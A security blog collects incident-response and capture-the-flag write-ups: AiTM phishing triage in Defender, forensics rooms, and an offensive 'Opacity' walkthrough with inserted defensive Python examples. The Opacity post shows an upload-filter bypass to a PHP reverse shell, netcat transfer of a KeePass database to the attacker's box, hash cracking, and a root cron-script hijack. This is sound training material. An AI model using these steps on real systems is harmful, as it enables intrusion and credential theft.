Wednesday, February 7, 2024

AiTM Phishing - Defender Investigation

AiTM - Phishing

Adversary in The Middle attacks seem to be on the rise and over the past few months I have seen a lot of attacks using EvilGINX and similar tools. Here is a quick guide for a first round of analysis when seeing this activity. 

The Attack

This attack vector is different to traditional phishing and a lot harder to protect users from. Upon a successful attack, the user is proxied to the site they are trying to log into, so as far as they are aware, they've legitimately logged in. The attack steals the user's session cookie and so bypasses any MFA protection. EvilGINX will also obtain a valid certificate, giving the phishing site that padlock we've always told users to look out for...

I won't go into the full attack here but if you want to read more there is a great talk from the creator, Kuba Gretzky, here , and a demo from John Hammond here


I am looking at this from Microsoft Defender's point of view, mostly because all of the alerts I've seen have come from Defender. When an alert comes in, the first thing I do is look into the domain. In this example a phishing email was sent to the user with a link to http[:]//findmedoc[.]site. Throwing the domain into VirusTotal shows it is clean.

I've found every domain in these attacks to be clean; the reason is that they are clean, since the site is just proxying the actual login page. What we want to look at is the age of the domain; in VT we can find this in the Details tab.
A newly registered domain being sent as a link via email is the red flag to take action! 

Check whois records for further information.

Everything about this domain is a worry. 

Due to the Defender alert being generated from the user actually clicking the link, you might want to think about disabling the user and resetting passwords before doing any further investigation. 

We can see the user clicked the link, and we also get the IP, which will be useful when looking for potential logins.

Now it is very likely the attacker will pivot IP for the login, but I've rarely seen that. 

My next actions will be to just disable the user, reset and then investigate related activity. It's better to ask for forgiveness for blocking a user.. you don't want to be on the other type of call... 

Click the View Related Activity as we want to see if the attacker is in the account and what they are doing. 

First, search for the IP seen under the "Raw IP" filter

We want to look for:

  • Successful logons
  • Any mailbox rules being created
  • SharePoint activity

The final check: as the attacker could have switched IP after the phish, we look at the account's login locations under User Page > Locations and click the number.

We want to investigate, if possible, all locations. At a minimum, look at all logins from any country outside of the user's normal geography.
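To show the triage steps above as a repeatable first pass, here is an added example (not from the original post, and not Defender's own export format): it takes a constructed, simplified CSV of sign-in and audit events and reports successful logins from the phishing IP, inbox rule changes, SharePoint file activity, logins outside the user's home countries, and any IPs first seen after the click (the attacker pivoting). The user, IPs, countries and operation names in the sample are placeholders.

```python
"""Added example: first-pass triage of a user's sign-in/audit events after an
AiTM phishing alert. The log format is a constructed, simplified CSV rather
than a real Defender or Unified Audit Log export."""
import csv
import io
from datetime import datetime

# Constructed sample events for one user: timestamp, user, source IP, country, operation, result.
# 203.0.113.10 is the placeholder IP that clicked the phishing link.
SAMPLE_LOG = """\
timestamp,user,ip,country,operation,result
2024-02-06T17:30:00Z,alice@example.com,192.0.2.44,GB,UserLoggedIn,Success
2024-02-07T09:01:12Z,alice@example.com,203.0.113.10,GB,UrlClicked,Allowed
2024-02-07T09:03:40Z,alice@example.com,203.0.113.10,GB,UserLoggedIn,Success
2024-02-07T09:05:02Z,alice@example.com,203.0.113.10,GB,New-InboxRule,Success
2024-02-07T09:20:55Z,alice@example.com,198.51.100.7,NL,UserLoggedIn,Success
2024-02-07T09:21:10Z,alice@example.com,198.51.100.7,NL,FileDownloaded,Success
2024-02-07T10:00:00Z,alice@example.com,192.0.2.44,GB,UserLoggedIn,Success
"""

# Operation names modelled on Exchange/SharePoint audit operations; treat as assumptions.
INBOX_RULE_OPS = {"New-InboxRule", "Set-InboxRule"}
SHAREPOINT_OPS = {"FileDownloaded", "FileUploaded", "FileAccessed"}


def parse_events(log_text):
    """Parse the CSV into dicts with a datetime field, oldest first."""
    rows = []
    for row in csv.DictReader(io.StringIO(log_text)):
        row["ts"] = datetime.strptime(row["timestamp"], "%Y-%m-%dT%H:%M:%SZ")
        rows.append(row)
    return sorted(rows, key=lambda r: r["ts"])


def triage(log_text, user, phish_ip, home_countries):
    """Apply the checks from the write-up to one user's events and say whether
    to contain (disable + reset) the account."""
    events = [e for e in parse_events(log_text) if e["user"] == user]
    clicks = [e["ts"] for e in events if e["operation"] == "UrlClicked" and e["ip"] == phish_ip]
    click_time = min(clicks) if clicks else None
    logins = [e for e in events if e["operation"] == "UserLoggedIn" and e["result"] == "Success"]
    # IPs the user logged in from before the click are the "known good" baseline.
    known_ips = {e["ip"] for e in logins if click_time and e["ts"] < click_time}
    report = {
        "click_time": click_time,
        "logins_from_phish_ip": [e["ts"] for e in logins if e["ip"] == phish_ip],
        "mailbox_rule_changes": [(e["ts"], e["ip"], e["operation"])
                                 for e in events if e["operation"] in INBOX_RULE_OPS],
        "sharepoint_activity": [(e["ts"], e["ip"], e["operation"])
                                for e in events if e["operation"] in SHAREPOINT_OPS],
        "foreign_logins": [(e["ts"], e["ip"], e["country"])
                           for e in logins if e["country"] not in home_countries],
        # Successful logins after the click from IPs never seen before it: possible pivot.
        "new_ips_after_click": sorted({e["ip"] for e in logins
                                       if click_time and e["ts"] >= click_time
                                       and e["ip"] not in known_ips}),
    }
    report["contain"] = bool(report["logins_from_phish_ip"]
                             or report["mailbox_rule_changes"]
                             or report["new_ips_after_click"])
    return report


if __name__ == "__main__":
    for key, value in triage(SAMPLE_LOG, "alice@example.com", "203.0.113.10", {"GB"}).items():
        print(f"{key}: {value}")
```

The baseline of "IPs seen before the click" is what makes the pivot check useful: the NL login in the sample would be flagged even though the attacker never reused the phishing IP.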

Hopefully this has been helpful!

Friday, January 12, 2024

THM - Digital Forensics Case B4DM755

TryHackMe | Digital Forensics Case B4DM755

Room Objectives

Learn about the following to build up the confidence of future Forensics Lab Analysts, DFIR First Responders, and Digital Forensics Investigators:

  • Ensure proper Chain of Custody procedures for transport to the Forensics Laboratory.
  • Use FTK Imager to acquire a forensic disk image and preserve digital artefacts and evidence.
  • Analyse forensic artefacts received at the Forensics Laboratory for presentation during a trial in a court of law.

Case B4DM755 - Details

Answering the first few sections is all pretty simple and the answers are in the content. 


As a Forensics Lab Analyst, you analyse the artefacts from crime scenes. Occasionally, the law enforcement agency you work for receives "intelligence reports" about different cases, and today is one such day. A trusted informant, who has connections to an international crime syndicate, contacted your supervisor about William S. McClean from Case #B4DM755.

The informant provided information about the whereabouts of the suspect, who is currently at large in Metro Manila, Philippines, and about a transaction that will happen today with a local gang member. They also knew the exact location of the meetup and that the suspect would have incriminating materials at the time.

The law enforcement agency prepared for the operation by obtaining proper search authority and assigning a DFIR (Digital Forensics & Incident Response) First Responder (i.e., you) to ensure the appropriate acquisition of digital artefacts and evidence for examination at the Forensics Lab, and eventually for use in litigation. The court issued a search warrant on the same day, allowing law enforcement officers to investigate the suspect and his place of residence based on the informant's tip.

FTK Imager

FTK Imager is a forensics tool that allows forensic specialists to acquire computer data and perform analysis without affecting the original evidence, preserving its authenticity, integrity, and validity for presentation during a trial in a court of law.

On the VM, load up FTK Imager. The "Evidence" is an emulated flash drive located at \\PHYSICALDRIVE2 - Microsoft Virtual Disk [1GB SCSI].

The following steps will add the Evidence:

File > Add Evidence Item

Choose Physical Drive

Select the correct drive, in this case it is Microsoft Virtual Disk [1GB SCSI]

Next check for encryption

File > Detect EFS Encryption

In this scenario there is no encryption present. 

As we learnt in the previous task, we have to create an image of the drive; we should never perform forensics on the original, as this would tamper with the evidence.

File > Create Disk Image

Select Physical Drive as the source

Select the correct source, again in this example it is Microsoft Virtual Disk [1GB SCSI]

The task mirrors real-world operations: we have to ensure we tick "Verify images after they are created" and "Create directory listing of all files in the image after they are created". Under Image Destination(s) click Add and set the Destination Image Type to Raw (dd). Finally, fill out the Evidence Item Information, set the Image Destination and click Start.

Ensure the hashes match and there are no bad blocks listed. 
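The "Verify images" step is just hashing the source and the image and comparing the digests. As an added example (not from the room and not FTK Imager's code), the following streams both through MD5 and SHA1 in chunks so a multi-GB image never has to fit in memory, and also re-checks an image against the SHA1 recorded at acquisition time so later alteration shows up. File paths and the recorded hash value are placeholders.

```python
"""Added example: verify a raw (dd) image against its source, and against a
hash recorded at acquisition, using streamed MD5/SHA1 digests."""
import hashlib
import io

CHUNK_SIZE = 1024 * 1024  # hash 1 MiB at a time


def digests_of(fh, chunk_size=CHUNK_SIZE):
    """Compute MD5 and SHA1 of a readable binary stream in one pass."""
    md5, sha1 = hashlib.md5(), hashlib.sha1()
    for block in iter(lambda: fh.read(chunk_size), b""):
        md5.update(block)
        sha1.update(block)
    return {"md5": md5.hexdigest(), "sha1": sha1.hexdigest()}


def digests_bytes(data):
    """Convenience wrapper for in-memory data (used for constructed test input)."""
    return digests_of(io.BytesIO(data))


def compare_digests(source, image):
    """Report whether two digest sets agree; a mismatch means the image is not
    a bit-for-bit copy (bad blocks, truncated write, or tampering)."""
    return {"source": source, "image": image, "match": source == image}


def verify_image(source_path, image_path):
    """Hash a source device/file and its image from disk and compare them."""
    with open(source_path, "rb") as src, open(image_path, "rb") as img:
        return compare_digests(digests_of(src), digests_of(img))


def check_recorded(image_digests, recorded_sha1):
    """Compare a fresh SHA1 with the value written on the chain-of-custody form."""
    return image_digests["sha1"].lower() == recorded_sha1.strip().lower()


if __name__ == "__main__":
    # Placeholder paths: point these at a real source and its dd image.
    result = verify_image("source.bin", "evidence.001")
    print("match" if result["match"] else "MISMATCH", result["image"]["sha1"])
```

Both hashes are kept because the verification text FTK Imager writes lists MD5 and SHA1 side by side; the comparison is case-insensitive since tools print hex digests in either case.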

The following can now be answered:

What is the UI element of FTK Imager which displays the content of selected files?

What is the SHA1 hash of the physical drive and forensic image?

We now want to add the copy as our Evidence to investigate, this is a little different to before. 

File > Add Evidence Item

Choose Image File

Browse to the location the image was saved to and select it.

We can now remove the original drive from the Evidence Tree:

Right-click it and choose Remove Evidence Item.

We want to analyse and inspect the contents of the drive; be sure to look for deleted items, corrupted files, and any obfuscation. Deleted files can be identified by the red cross through the file type icon.

To recover these deleted files we want to Export Files. Right-click on the target directory and click Export Files, this will save the artefacts. 

We can now answer the final questions of this task:

Including hidden files, how many files are currently stored on the flash drive?

How many files were deleted in total?

How many recovered files are corrupted (e.g., 0 file size)?

Task 7

Aside from FTK Imager, what is the directory name of the other tool located in the tools directory under Desktop?

Navigate to the desktop and look inside the Tools folder. 

What is the visible extension of the "hideout" file?

This can be found within FTK Imager or the exported files, the file is named

View the metadata of the "hideout" file. What is its actual extension?

We can use exiftool.exe, either by running it directly or from the command line: exiftool.exe "C:\Users\analyst\Desktop\artefacts\[root]\hideout.pdf" (set the path to wherever you exported the files).

This will reveal what the file really is. 

A phone was used to photograph the "hideout". What is the phone's model?

This can be found in the metadata under Camera Model Name 

A phone was used to photograph the "warehouse". What is the phone's model?

Same process using exiftool, again found under the Camera Model Name

Are there any indications that the suspect is involved in other illegal activity? (Y/N)

Use exiftool to check all the files; one is not what it says it is and is actually a .zip, so extract it.
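What exiftool is doing for the "actual extension" questions (the hideout file above and the disguised .zip here) is reading the file's signature rather than trusting its name. As an added example (not from the room and not exiftool), the following compares the first bytes of each file with a small table of known signatures and lists every file whose name disagrees with its content. The sample files are constructed in memory; the names are placeholders rather than the room's files, and the signature table is limited to the types it lists.

```python
"""Added example: detect files whose extension does not match their content by
checking magic bytes, the same idea exiftool's "File Type" output is based on."""
import os

# (signature, canonical type). Office Open XML documents are ZIP containers,
# so "docx" legitimately sniffs as "zip"; EQUIVALENT handles that below.
MAGIC = [
    (b"%PDF-", "pdf"),
    (b"\xff\xd8\xff", "jpg"),
    (b"\x89PNG\r\n\x1a\n", "png"),
    (b"GIF87a", "gif"),
    (b"GIF89a", "gif"),
    (b"PK\x03\x04", "zip"),
    (b"PK\x05\x06", "zip"),      # empty archive
    (b"\xd0\xcf\x11\xe0", "doc"),  # legacy OLE2 Office container
]
EQUIVALENT = {"jpeg": "jpg", "docx": "zip", "xlsx": "zip", "pptx": "zip", "jar": "zip"}


def sniff(data):
    """Return the canonical type for the leading bytes, or 'unknown'."""
    for signature, kind in MAGIC:
        if data.startswith(signature):
            return kind
    return "unknown"


def claimed_extension(name):
    return os.path.splitext(name)[1].lstrip(".").lower()


def find_mismatches(files):
    """files: {name: leading bytes}. Returns (name, claimed, actual) for each
    file whose signature contradicts its extension. Plain text has no magic,
    so 'unknown' content is never reported as a mismatch."""
    findings = []
    for name, data in files.items():
        actual = sniff(data)
        if actual == "unknown":
            continue
        claimed = claimed_extension(name)
        if EQUIVALENT.get(claimed, claimed) != actual:
            findings.append((name, claimed, actual))
    return sorted(findings)


def scan_directory(path, head=16):
    """Read the first bytes of every regular file under path and check them."""
    files = {}
    for root, _dirs, names in os.walk(path):
        for name in names:
            with open(os.path.join(root, name), "rb") as fh:
                files[os.path.relpath(os.path.join(root, name), path)] = fh.read(head)
    return find_mismatches(files)


# Constructed sample set: two honest files, one JPEG wearing a .pdf name,
# one ZIP wearing a .txt name, and a text file that has no signature at all.
SAMPLE_FILES = {
    "report.pdf": b"%PDF-1.4\n%\xe2\xe3\xcf\xd3\n",
    "contract.docx": b"PK\x03\x04\x14\x00\x06\x00",
    "photo.pdf": b"\xff\xd8\xff\xe1\x00\x16Exif\x00\x00",
    "archive.txt": b"PK\x03\x04\x14\x00\x00\x00\x08\x00",
    "notes.txt": b"meeting moved to thursday\n",
}

if __name__ == "__main__":
    for name, claimed, actual in find_mismatches(SAMPLE_FILES):
        print(f"{name}: named .{claimed} but content is {actual}")
```

Run scan_directory on the exported artefacts folder to get the same list for real files; anything it flags is a candidate for the "not what it says it is" question.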

Who was the point of contact of Mr William S. McClean in 2022?

Check in the newly discovered .zip, there is a notes.txt file

A meetup occurred in 2022. What are the GPS coordinates during that time?

Can also be found in notes.txt

What is the password to extract the contents of

Have a guess... lol yup, notes.txt


From which company did the source code in the pandorasbox directory originate?

Look in the HFT_Algorithm directory, where we see some Python scripts. These scripts include a header; open one with Notepad.

In one of the documents that the suspect has yet to sign, who was listed as the beneficiary?

Analyse the Word docs; the Victim can be found in UTCL242231.

What is the hidden flag?

The file named DONOTOPEN looks like it should definitely be opened... change it to a .txt

Task 8 can be answered from the content. 


Wednesday, May 17, 2023

THM - Windows Forensics 1


One of the Desktops in the research lab at Organization X is suspected to have been accessed by someone unauthorized. Although they generally have only one user account per Desktop, there were multiple user accounts observed on this system. It is also suspected that the system was connected to some network drive, and a USB device was connected to the system. The triage data from the system was collected and placed on the attached VM. Can you help Organization X with finding answers to the below questions?


How many user created accounts are present on the system?
Load the SAM hive found in triage\C\Windows\System32\Config; within it we can find the users. The question only wants user-created accounts, so disregarding the built-in accounts we have 3.

What is the username of the account that has never been logged in?
We can answer this within the same hive; there is only one user without a Last Login Time.

What's the password hint for the user THM-4n6?

Can also be answered from within here :)

When was the file 'Changelog.txt' accessed?
Load the NTUSER hive, drill down to RecentDocs and check .txt files. 

What is the complete path from where the python 3.8.2 installer was run?
Within the user's NTUSER hive, drill down to the UserAssist registry keys and look for the GUID with the most values. Within here you can find all the applications which have been executed.

When was the USB device with the friendly name 'USB' last connected?
The question is to find the USB device with the friendly name 'USB', so let's look in SOFTWARE\Microsoft\Windows Portable Devices\Devices.

Further USB information can be found within the SYSTEM hive under:

Look at the device with the GUID matching the friendly named USB device.

Tuesday, April 25, 2023

THM - Opacity


Starting Nmap 7.93 ( ) at 2023-04-25 11:11 BST

Nmap scan report for

Host is up (0.022s latency).

Not shown: 65531 closed tcp ports (conn-refused)

22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 0fee2910d98e8c53e64de3670c6ebee3 (RSA)
| 256 9542cdfc712799392d0049ad1be4cf0e (ECDSA)
|_ 256 edfe9c94ca9c086ff25ca6cf4d3c8e5b (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
| http-title: Login
|_Requested resource was login.php
| http-cookie-flags:
| /:
|_ httponly flag not set
139/tcp open netbios-ssn Samba smbd 4.6.2
445/tcp open netbios-ssn Samba smbd 4.6.2
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|_nbstat: NetBIOS name: OPACITY, NetBIOS user: <unknown>, NetBIOS MAC: 000000000000 (Xerox)
| smb2-security-mode:
| 311:
|_ Message signing enabled but not required
| smb2-time:
| date: 2023-04-25T10:11:28
|_ start_date: N/A

Service detection performed. Please report any incorrect results at .

Nmap done: 1 IP address (1 host up) scanned in 26.62 seconds

Port 80 open with Apache 2.4.41 running
SMB running

Login box at port 80

More enumeration!

└─$ smbclient -L \\\\
Password for [WORKGROUP\kali]:
Sharename Type Comment
--------- ---- -------
print$ Disk Printer Drivers
IPC$ IPC IPC Service (opacity server (Samba, Ubuntu))

not much without authentication for SMB

└─$ smbmap -H
[+] IP: Name:
Disk Permissions Comment
---- ----------- -------
print$ NO ACCESS Printer Drivers
IPC$ NO ACCESS IPC Service (opacity server (Samba, Ubuntu))
START_TIME: Tue Apr 25 11:30:03 2023

WORDLIST_FILES: /usr/share/wordlists/dirb/big.txt
---- Scanning URL: ----

The cloud directory looks interesting!

We can try to upload things!


Whilst dirb was running in the background it also found , which I assume is where the uploaded images are stored.

I hosted a server and tried to upload a shell using . It didn't like this as it had to be an image.

I tried with just a space and then the .jpg, which didn't work; using a null character #.jpg worked and we had a shell... for a time. The 5-minute file upload meant you only have 5 minutes until the files are deleted.

$ ls
$ whoami
$ cd home
$ ls
$ cd sysadmin
$ ls
$ cat local.txt
cat: local.txt: Permission denied

We have a second user, sysadmin, we want this one!

www-data doesn't have much access. There is a scripts folder, but we don't have permissions for that; we do have access to opt, though, and there is an interesting file in there called dataset.kdbx. A kdbx file is a KeePass database, and we want this!

After some hunting I found we can transfer files using netcat (nc). To do this, on the destination host (our attack box) we want to listen for the file:

Example: nc -l -p 7555 > myfile.txt
nc -lnvp 4446 > dataset.kdbx

On the source host (victim) we send the file:
nc 7555 < myfile.txt
nc 4446 < dataset.kdbx

We now have the file! Let's crack it.

Following the guide from we can pull out the hash using keepass2john and then crack the password.

keepass2john dataset.kdbx > hash.txt

Take the cracked password, open the database, get the new creds.

Remember, SSH is open, let's go get our first flag!


Now we're on the machine without a time limit, we can take a breath and think of the next step. Under the sysadmin user's home there is a scripts folder containing script.php, which is the script used to delete the files found within the images folder. This runs every 5 minutes and could be useful. There are a bunch of PHP files under the lib directory.

sysadmin@opacity:~/scripts$ ls -lha
total 16K
drwxr-xr-x 3 root root 4.0K Jul 8 2022 .
drwxr-xr-x 6 sysadmin sysadmin 4.0K Feb 22 08:16 ..
drwxr-xr-x 2 sysadmin root 4.0K Jul 26 2022 lib
-rw-r----- 1 root sysadmin 519 Jul 8 2022 script.php

Hello... the script is owned by root... but we can't edit :(

After a little, okay a lot, of thinking: we know root is running the script, and we know there is a job to run script.php from the scripts folder. What if we just make a new script which is a reverse shell? Let's give it a go. Using the same script as before, we can load that into a new scripts folder (moving/renaming the old one), call it script.php, set up the listener and wait....

Boom, it worked! From here we can get the final flag!
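The weakness here is not the script's permissions (root-owned, not writable) but the chain of directories above it: the parent of scripts is owned by sysadmin, so sysadmin can rename the whole folder and put a different one in its place. As an added example (not from the room or the write-up), here is an audit that walks every component of a path a privileged job executes and reports the first one a non-root user could modify. The stat function is injectable so it can be run against a constructed tree modelled on the ls -lha listing above; with the default os.stat it checks the live filesystem.

```python
"""Added example: audit the ancestor chain of a script run by a privileged job
and report components a non-root user could rename, replace or edit."""
import os
import stat


def os_stat(path):
    """Default backend: (uid, gid, mode) from the live filesystem."""
    s = os.stat(path)
    return s.st_uid, s.st_gid, s.st_mode


def stat_from_table(table):
    """Backend that answers from a constructed {path: (uid, gid, mode)} table."""
    return lambda path: table[path]


def path_components(path):
    """'/a/b/c' -> ['/', '/a', '/a/b', '/a/b/c'] (absolute POSIX paths only)."""
    comps, current = ["/"], ""
    for segment in path.strip("/").split("/"):
        current = current + "/" + segment
        comps.append(current)
    return comps


def weak_components(path, stat_fn=os_stat, trusted_uids=(0,)):
    """Return [(component, reason)] for every path element that an untrusted
    user can change. For a directory, write permission means entries inside it
    (including the next component) can be renamed or replaced."""
    findings = []
    comps = path_components(path)
    for index, comp in enumerate(comps):
        uid, gid, mode = stat_fn(comp)
        is_dir = stat.S_ISDIR(mode)
        effect = "rename or replace entries inside it" if is_dir else "edit it"
        if uid not in trusted_uids and mode & stat.S_IWUSR:
            findings.append((comp, f"owned by uid {uid}, who can {effect}"))
        elif gid != 0 and mode & stat.S_IWGRP:
            findings.append((comp, f"writable by group {gid}, which can {effect}"))
        # World-writable directories with the sticky bit (e.g. /tmp) stop other
        # users renaming entries they do not own, so they are not flagged.
        elif mode & stat.S_IWOTH and not (is_dir and mode & stat.S_ISVTX):
            findings.append((comp, f"world writable, anyone can {effect}"))
    return findings


D, F = stat.S_IFDIR, stat.S_IFREG
# Constructed tree modelled on the listing in the write-up: sysadmin owns its
# home directory (uid/gid 1000), root owns scripts/ and script.php.
AS_FOUND = {
    "/": (0, 0, D | 0o755),
    "/home": (0, 0, D | 0o755),
    "/home/sysadmin": (1000, 1000, D | 0o755),
    "/home/sysadmin/scripts": (0, 0, D | 0o755),
    "/home/sysadmin/scripts/script.php": (0, 1000, F | 0o640),
}
# Hardened layout: every component on the way to the script is root-owned.
HARDENED = {
    "/": (0, 0, D | 0o755),
    "/opt": (0, 0, D | 0o755),
    "/opt/scripts": (0, 0, D | 0o755),
    "/opt/scripts/script.php": (0, 0, F | 0o640),
}

if __name__ == "__main__":
    for comp, why in weak_components("/home/sysadmin/scripts/script.php",
                                     stat_from_table(AS_FOUND)):
        print(f"{comp}: {why}")
```

The fix the hardened table shows is the usual one: anything a root cron job executes should live under a path whose every component is root-owned and not group- or world-writable.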

Really fun machine this one, luckily my brain has a small capacity and I totally forgot about SMB which wasn't required. The folder being cleared out stumped me for a while until the penny dropped and getting root being as simple as it was tripped me!

Monday, April 24, 2023

THM - Investigating Windows


This is a challenge that is exactly what it says on the tin: there are a few questions around investigating a Windows machine that has been previously compromised.


What's the version and year of the Windows machine?
systeminfo | findstr /B /C:"OS Name" /C:"OS Version"

Which user logged in last?
Get-LocalUser | Select Name, Lastlogon

When did John log onto the system last?
We can get that info from our last command

What IP does the system connect to when it first starts?
There will be a cmd pop up upon system login with the IP

What two accounts had administrative privileges (other than the Administrator user)?
net localgroup administrators

What's the name of the scheduled task that is malicious?
Check the scheduled tasks, there will be a few obvious ones which stick out! Check the actions of each.

What file was the task trying to run daily?
Found under the actions of the malicious task.

What port did this file listen locally for?
Found under the actions of the malicious task.

When did Jenny last logon?
We can use Get-LocalUser | Select Name, Lastlogon again, or check the Security log in Event Viewer and filter for Jenny and EID 4624.

At what date did the compromise take place?
Something was created for persistence, when?

At what time did Windows first assign special privileges to a new logon?
Search EID 4672 under the security log.

What tool was used to get Windows passwords?
We can find that within the TMP folder the attackers created.

What was the attacker's external control and command server's IP?
Check the hosts file for any potential changes made by the attacker

What was the extension name of the shell uploaded via the server's website?
Check wwwroot

What was the last port the attacker opened?
Check the firewall rules for inbound, there are a few suspicious ports being opened to allow inbound connectivity.

Check for DNS poisoning, what site was targeted?
We found this within the hosts file.
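Both of the hosts-file questions come down to the same check: a stock hosts file only points names at the local machine, so any entry mapping a hostname to a routable address is either an admin's deliberate override or an attacker's C2 pointer / DNS poisoning. As an added example (not from the room), this parser flags every such entry, including IPv6 and entries hidden after other names on a line. The sample hosts content, IPs and names are constructed placeholders.

```python
"""Added example: flag hosts-file entries that resolve a name to a non-local
address, the hosts-file equivalent of DNS poisoning."""
import ipaddress

# Constructed sample in the Windows hosts format; the last two lines stand in
# for what an attacker might add (addresses are documentation ranges).
SAMPLE_HOSTS = """\
# localhost name resolution is handled within DNS itself.
127.0.0.1       localhost
::1             localhost
127.0.0.1       myapp.local        # developer override, harmless
203.0.113.5     www.example.com    # legitimate-looking site pointed elsewhere
198.51.100.20   update.example.net c2.example.net
"""


def parse_hosts(text):
    """Yield (line_number, ip, hostname) for every name on every active line."""
    entries = []
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        parts = line.split()
        try:
            ip = ipaddress.ip_address(parts[0])
        except ValueError:
            continue  # not a hosts entry (or deliberately malformed); skip
        for name in parts[1:]:
            entries.append((lineno, ip, name.lower()))
    return entries


def suspicious_entries(text):
    """Entries that send a name somewhere other than this machine. Loopback,
    unspecified and link-local targets are the only ones a default file uses."""
    flagged = []
    for lineno, ip, name in parse_hosts(text):
        if ip.is_loopback or ip.is_unspecified or ip.is_link_local:
            continue
        flagged.append({"line": lineno, "ip": str(ip), "name": name})
    return flagged


def check_hosts_file(path=r"C:\Windows\System32\drivers\etc\hosts"):
    """Run the check against a real hosts file (default is the Windows path)."""
    with open(path, encoding="utf-8", errors="replace") as fh:
        return suspicious_entries(fh.read())


if __name__ == "__main__":
    for entry in suspicious_entries(SAMPLE_HOSTS):
        print(f"line {entry['line']}: {entry['name']} -> {entry['ip']}")
```

The IP an attacker points a name at is itself an indicator: in the sample every flagged name shares one of two addresses, which is how the "C2 server IP" and "which site was targeted" questions tie together.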

Wednesday, April 5, 2023

HTB - Illumination

Initial Investigation & Solution

We can actually find the problem upon unzipping the challenge.

We see immediately that there is a .git folder along with what looks to be the log file!

Using git to read the log.

A token was removed as a security precaution; dig a little deeper and view the change.


There is the token! Looks to be base64 so simply decode and we have our flag!


Friday, March 17, 2023

HTB - Behind The Scenes

Initial Investigation

Upon running the application it asks us for ./challenge <password> 

Let's run strings and see what we find:

The interesting part is that we can see it expects the password to be in the format HTB{something}.


We can throw the binary into Ghidra and see what else we find. Within main, the disassembly looks to stop.

There is a UD2 instruction and then disassembly stops.  
After some research I found this within the Ghidra GitHub issues . User pjsoberoi's comment is the solution:
"IMHO that is the correct behavior. You can manually disassemble the bytes after but that shouldn't change the decompilation. You can edit your own x86 slaspec and replace ud2 instruction with a "nop" pcode instruction. This should basically make the decompiler ignore the ud2 instruction. That seems like what you want." 
With this information I disassembled the rest.
We then run through and replace all the UD2 instructions with a NOP and slowly the code is built out until we eventually get our password and flag!
